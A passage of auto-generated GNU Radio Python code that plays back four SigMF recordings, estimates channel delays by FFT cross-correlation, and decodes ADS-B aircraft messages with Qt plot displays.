self.qtgui_freq_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_0_win, 0, 1, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0.enable_grid(False)
self.qtgui_freq_sink_x_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_win, 0, 0, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_0_win, 1, 4, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(4, 5):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_win, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_win = self.pyqt_meta_text_output_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_win, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_win = self.pyqt_meta_text_output_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_win, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_win = self.pyqt_meta_text_output_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_win, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.fft_vxx_1_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.blocks_throttle_3 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_2 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_1 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate /throttle,True)
self.blocks_throttle_0 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_stream_to_vector_0_1_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_skiphead_3 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_2 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_1 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_short_to_float_0_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0 = blocks.short_to_float(1, 1)
self.blocks_null_sink_0_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_multiply_const_vxx_0_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_conjugate_cc_0_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_max_xx_0_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0 = blocks.max_ff(nfft,1)
self.blocks_delay_3 = blocks.delay(gr.sizeof_gr_complex*1, delay_3)
self.blocks_delay_2 = blocks.delay(gr.sizeof_gr_complex*1, delay_2)
self.blocks_delay_1 = blocks.delay(gr.sizeof_gr_complex*1, delay_1)
self.blocks_delay_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0)
self.blocks_complex_to_mag_squared_1_0_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_2 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_0_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0 = blocks.complex_to_mag(nfft)
self.blocks_argmax_xx_0_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0 = blocks.argmax_fs(nfft)
self.blocks_add_xx_0 = blocks.add_vcc(1)
self.blocks_add_const_vxx_1_0_0 = blocks.add_const_vff((float(delay_3), ))
self.blocks_add_const_vxx_1_0 = blocks.add_const_vff((float(delay_2), ))
self.blocks_add_const_vxx_1 = blocks.add_const_vff((float(delay_1), ))
self.blocks_add_const_vxx_0_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0 = blocks.add_const_vff((-nfft / 2, ))
self.analog_const_source_x_0_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_agc2_xx_0_3 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_3.set_max_gain(65536)
self.analog_agc2_xx_0_2 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_2.set_max_gain(65536)
self.analog_agc2_xx_0_1 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_1.set_max_gain(65536)
self.analog_agc2_xx_0 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0.set_max_gain(65536)
self.adsb_framer_1_0_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1 = adsb.framer(samp_rate, thresh)
self.adsb_demod_0_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0 = adsb.demod(samp_rate)
self.adsb_decoder_0_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
##################################################
# Connections
##################################################
self.msg_connect((self.adsb_decoder_0, 'decoded'), (self.pyqt_meta_text_output_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_demod_0, 'demodulated'), (self.adsb_decoder_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0, 'demodulated'), (self.adsb_decoder_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0_0, 'demodulated'))
self.connect((self.adsb_demod_0, 0), (self.qtgui_time_sink_x_0_1_0, 0))
self.connect((self.adsb_demod_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 0))
self.connect((self.adsb_demod_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 0))
self.connect((self.adsb_framer_1, 0), (self.adsb_demod_0, 0))
self.connect((self.adsb_framer_1_0, 0), (self.adsb_demod_0_0, 0))
self.connect((self.adsb_framer_1_0_0, 0), (self.adsb_demod_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0, 0), (self.adsb_demod_0_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0_0, 0), (self.adsb_demod_0_0_0_0_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_freq_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_waterfall_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_complex_to_mag_squared_0_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_freq_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_waterfall_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_complex_to_mag_squared_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_freq_sink_x_0_1, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_waterfall_sink_x_0_0_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_complex_to_mag_squared_0_1_1, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_freq_sink_x_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_waterfall_sink_x_0_0_1, 0))
self.connect((self.analog_const_source_x_0, 0), (self.qtgui_time_sink_x_0_1_0, 1))
self.connect((self.analog_const_source_x_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 1))
self.connect((self.blocks_add_const_vxx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.blocks_add_const_vxx_0_0, 0), (self.blocks_multiply_const_vxx_0_0, 0))
self.connect((self.blocks_add_const_vxx_0_0_0, 0), (self.blocks_multiply_const_vxx_0_0_0, 0))
self.connect((self.blocks_add_const_vxx_1, 0), (self.qtgui_number_sink_0, 0))
self.connect((self.blocks_add_const_vxx_1_0, 0), (self.qtgui_number_sink_0, 1))
self.connect((self.blocks_add_const_vxx_1_0_0, 0), (self.qtgui_number_sink_0, 2))
self.connect((self.blocks_add_xx_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0, 0))
self.connect((self.blocks_argmax_xx_0, 1), (self.blocks_null_sink_0, 0))
self.connect((self.blocks_argmax_xx_0, 0), (self.blocks_short_to_float_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 1), (self.blocks_null_sink_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 0), (self.blocks_short_to_float_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 1), (self.blocks_null_sink_0_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 0), (self.blocks_short_to_float_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_0, 0), (self.single_pole_iir_filter_xx_0, 0))
self.connect((self.blocks_complex_to_mag_0_0, 0), (self.single_pole_iir_filter_xx_0_0, 0))
self.connect((self.blocks_complex_to_mag_0_0_0, 0), (self.single_pole_iir_filter_xx_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.qtgui_time_sink_x_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_0, 0), (self.qtgui_time_sink_x_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1, 0), (self.qtgui_time_sink_x_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0, 0), (self.qtgui_time_sink_x_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1, 2))
self.connect((self.blocks_complex_to_mag_squared_0_1_1, 0), (self.qtgui_time_sink_x_0_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_1_0, 0), (self.qtgui_time_sink_x_0_1, 3))
self.connect((self.blocks_complex_to_mag_squared_0_1_2, 0), (self.qtgui_time_sink_x_0_1, 1))
self.connect((self.blocks_complex_to_mag_squared_1, 0), (self.adsb_framer_1, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0, 0), (self.adsb_framer_1_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0, 0), (self.adsb_framer_1_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0, 0), (self.adsb_framer_1_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.adsb_framer_1_0_0_0_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_add_xx_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_0_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_add_xx_0, 1))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_0_1_2, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_stream_to_vector_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_add_xx_0, 2))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_0_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_stream_to_vector_0_0_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_add_xx_0, 3))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_0_1_1_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_1_0_0_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_stream_to_vector_0_0_0_0, 0))
self.connect((self.blocks_max_xx_0, 0), (self.qtgui_time_sink_x_1, 0))
self.connect((self.blocks_max_xx_0_0, 0), (self.qtgui_time_sink_x_1, 1))
self.connect((self.blocks_max_xx_0_0_0, 0), (self.qtgui_time_sink_x_1, 2))
self.connect((self.blocks_multiply_conjugate_cc_0, 0), (self.fft_vxx_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0, 0), (self.fft_vxx_0_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0_0, 0), (self.fft_vxx_0_0_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.blocks_add_const_vxx_1, 0))
self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.blocks_add_const_vxx_1_0, 0))
self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.blocks_add_const_vxx_1_0_0, 0))
self.connect((self.blocks_short_to_float_0, 0), (self.blocks_add_const_vxx_0, 0))
self.connect((self.blocks_short_to_float_0_0, 0), (self.blocks_add_const_vxx_0_0, 0))
self.connect((self.blocks_short_to_float_0_0_0, 0), (self.blocks_add_const_vxx_0_0_0, 0))
self.connect((self.blocks_skiphead_0, 0), (self.blocks_throttle_0, 0))
self.connect((self.blocks_skiphead_1, 0), (self.blocks_throttle_1, 0))
self.connect((self.blocks_skiphead_2, 0), (self.blocks_throttle_2, 0))
self.connect((self.blocks_skiphead_3, 0), (self.blocks_throttle_3, 0))
self.connect((self.blocks_stream_to_vector_0, 0), (self.fft_vxx_0, 0))
self.connect((self.blocks_stream_to_vector_0_0, 0), (self.fft_vxx_1, 0))
self.connect((self.blocks_stream_to_vector_0_0_0, 0), (self.fft_vxx_1_0, 0))
self.connect((self.blocks_stream_to_vector_0_0_0_0, 0), (self.fft_vxx_1_0_0, 0))
self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0_1, 0))
self.connect((self.blocks_stream_to_vector_0_1_0, 0), (self.fft_vxx_0_1_0, 0))
self.connect((self.blocks_throttle_0, 0), (self.analog_agc2_xx_0, 0))
self.connect((self.blocks_throttle_1, 0), (self.analog_agc2_xx_0_1, 0))
self.connect((self.blocks_throttle_2, 0), (self.analog_agc2_xx_0_2, 0))
self.connect((self.blocks_throttle_3, 0), (self.analog_agc2_xx_0_3, 0))
self.connect((self.fft_vxx_0, 0), (self.blocks_multiply_conjugate_cc_0, 0))
self.connect((self.fft_vxx_0_0, 0), (self.blocks_complex_to_mag_0, 0))
self.connect((self.fft_vxx_0_0_0, 0), (self.blocks_complex_to_mag_0_0, 0))
self.connect((self.fft_vxx_0_0_0_0, 0), (self.blocks_complex_to_mag_0_0_0, 0))
self.connect((self.fft_vxx_0_1, 0), (self.blocks_multiply_conjugate_cc_0_0, 0))
self.connect((self.fft_vxx_0_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 0))
self.connect((self.fft_vxx_1, 0), (self.blocks_multiply_conjugate_cc_0, 1))
self.connect((self.fft_vxx_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0, 1))
self.connect((self.fft_vxx_1_0_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 1))
self.connect((self.sigmf_source_0, 0), (self.blocks_skiphead_0, 0))
self.connect((self.sigmf_source_1, 0), (self.blocks_skiphead_1, 0))
self.connect((self.sigmf_source_2, 0), (self.blocks_skiphead_2, 0))
self.connect((self.sigmf_source_3, 0), (self.blocks_skiphead_3, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_argmax_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_max_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.qtgui_vector_sink_f_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_argmax_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_max_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.qtgui_vector_sink_f_0, 1))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_argmax_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_max_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.qtgui_vector_sink_f_0, 2))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback3")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_trig_delay(self):
return self.trig_delay
def set_trig_delay(self, trig_delay):
self.trig_delay = trig_delay
Qt.QMetaObject.invokeMethod(self._trig_delay_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.trig_delay)))
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_trig_channel(self):
return self.trig_channel
def set_trig_channel(self, trig_channel):
self.trig_channel = trig_channel
self._trig_channel_callback(self.trig_channel)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_throttle(self):
return self.throttle
def set_throttle(self, throttle):
self.throttle = throttle
Qt.QMetaObject.invokeMethod(self._throttle_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.throttle)))
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_thresh(self):
return self.thresh
def set_thresh(self, thresh):
self.thresh = thresh
Qt.QMetaObject.invokeMethod(self._thresh_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh)))
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.analog_const_source_x_0_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0.set_offset(self.thresh)
self.analog_const_source_x_0.set_offset(self.thresh)
self.adsb_framer_1_0_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0.set_threshold(self.thresh)
self.adsb_framer_1.set_threshold(self.thresh)
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.qtgui_waterfall_sink_x_0_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0.set_frequency_range(0, self.samp_rate)
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0_1.set_samp_rate(self.samp_rate)
